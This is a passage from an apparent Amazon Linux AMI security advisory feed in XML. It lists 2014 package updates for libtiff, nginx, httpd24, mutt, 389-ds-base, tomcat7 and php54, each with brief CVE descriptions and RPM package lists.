</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0060" title="" id="CVE-2014-0060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0061" title="" id="CVE-2014-0061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0062" title="" id="CVE-2014-0062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0063" title="" id="CVE-2014-0063" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0064" title="" id="CVE-2014-0064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0065" title="" id="CVE-2014-0065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0066" title="" id="CVE-2014-0066" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0211.html" title="" id="RHSA-2014:0211" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql9-server" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-test" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-upgrade-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-devel" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plperl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.2.7-1.40.amzn1.x86_64.rpm</filename></package><package name="postgresql9-server" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-libs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-upgrade-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-docs" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.2.7-1.40.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.2.7" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.2.7-1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-307</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-307: medium priority package update for libtiff</title><issued date="2014-03-13 18:13:00" /><updated date="2014-09-17 22:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4244:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
CVE-2013-4243:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
CVE-2013-4232:
A heap-based buffer overflow and a use-after-free flaw were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
CVE-2013-4231:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
CVE-2013-1961:
Multiple buffer overflow flaws were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash.
CVE-2013-1960:
A heap-based buffer overflow and a use-after-free flaw were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
CVE-2010-2596:
A flaw was found in the way libtiff handled OJPEG-encoded TIFF images. An attacker could use this flaw to create a specially crafted TIFF file that would cause an application using libtiff to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2596" title="" id="CVE-2010-2596" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1960" title="" id="CVE-2013-1960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1961" title="" id="CVE-2013-1961" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4231" title="" id="CVE-2013-4231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4232" title="" id="CVE-2013-4232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4243" title="" id="CVE-2013-4243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4244" title="" id="CVE-2013-4244" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0222.html" title="" id="RHSA-2014:0222" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="10.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-10.12.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="10.12.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-10.12.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="10.12.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-3.9.4-10.12.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="10.12.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-10.12.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="10.12.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-10.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-308</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-308: important priority package update for nginx</title><issued date="2014-03-24 23:32:00" /><updated date="2014-09-17 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0133:
1077988:
CVE-2014-0133 nginx: heap-based buffer overflow in SPDY implementation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0133" title="" id="CVE-2014-0133" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-debuginfo" version="1.4.7" release="1.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.4.7-1.17.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.4.7" release="1.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.4.7-1.17.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.4.7" release="1.17.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.4.7-1.17.amzn1.i686.rpm</filename></package><package name="nginx" version="1.4.7" release="1.17.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.4.7-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-309</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-309: medium priority package update for httpd24</title><issued date="2014-03-24 23:33:00" /><updated date="2014-09-17 22:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0098:
1077871:
CVE-2014-0098 httpd: mod_log_config does not properly handle logging certain cookies resulting in DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098" title="" id="CVE-2014-0098" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ldap" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.9" release="1.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.9" release="1.54.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.9-1.54.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.9" release="1.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.9" release="1.54.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.9" release="1.54.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.9-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-310</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-310: important priority package update for mutt</title><issued date="2014-03-24 23:33:00" /><updated date="2014-09-17 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0467:
A heap-based buffer overflow flaw was found in the way mutt processed certain email headers. A remote attacker could use this flaw to send an email with specially crafted headers that, when processed, could cause mutt to crash or, potentially, execute arbitrary code with the permissions of the user running mutt.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0467" title="" id="CVE-2014-0467" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0304.html" title="" id="RHSA-2014:0304" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mutt-debuginfo" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-debuginfo-1.5.20-4.20091214hg736b6a.7.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-1.5.20-4.20091214hg736b6a.7.amzn1.x86_64.rpm</filename></package><package name="mutt-debuginfo" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-debuginfo-1.5.20-4.20091214hg736b6a.7.amzn1.i686.rpm</filename></package><package name="mutt" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-1.5.20-4.20091214hg736b6a.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-311</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-311: important priority package update for 389-ds-base</title><issued date="2014-03-24 23:34:00" /><updated date="2014-09-17 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0132:
It was discovered that the 389 Directory Server did not properly handle certain SASL-based authentication mechanisms. A user able to authenticate to the directory using these SASL mechanisms could connect as any other directory user, including the administrative Directory Manager account. This could allow them to modify configuration values, as well as read and write any data the directory holds.
1074845:
CVE-2014-0132 389-ds: flaw in parsing authzid can lead to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0132" title="" id="CVE-2014-0132" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.2.16-1.16.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.2.16-1.16.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.2.16-1.16.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.2.16-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-312</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-312: medium priority package update for tomcat7</title><issued date="2014-03-24 23:36:00" /><updated date="2014-09-17 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0050:
1062337:
CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050" title="" id="CVE-2014-0050" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-docs-webapp" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-313</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-313: medium priority package update for php54</title><issued date="2014-03-24 23:37:00" /><updated date="2014-09-17 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2270:
1072220:
CVE-2014-2270 file: out-of-bounds memory access when parsing Portable Executable (PE) format files
CVE-2014-1943:
Fine Free file before 5.17 allows context-dependent attackers to cause a denial of service (infinite recursion, CPU consumption, and crash) via a crafted indirect offset value in the magic of a file.
1065836:
CVE-2014-1943 file: unrestricted recursion in handling of indirect type rules
1065836:
CVE-2014-1943 file: infinite recursion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943" title="" id="CVE-2014-1943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270" title="" id="CVE-2014-2270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-dba" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.26" release="1.51.amzn1" epoch="0" 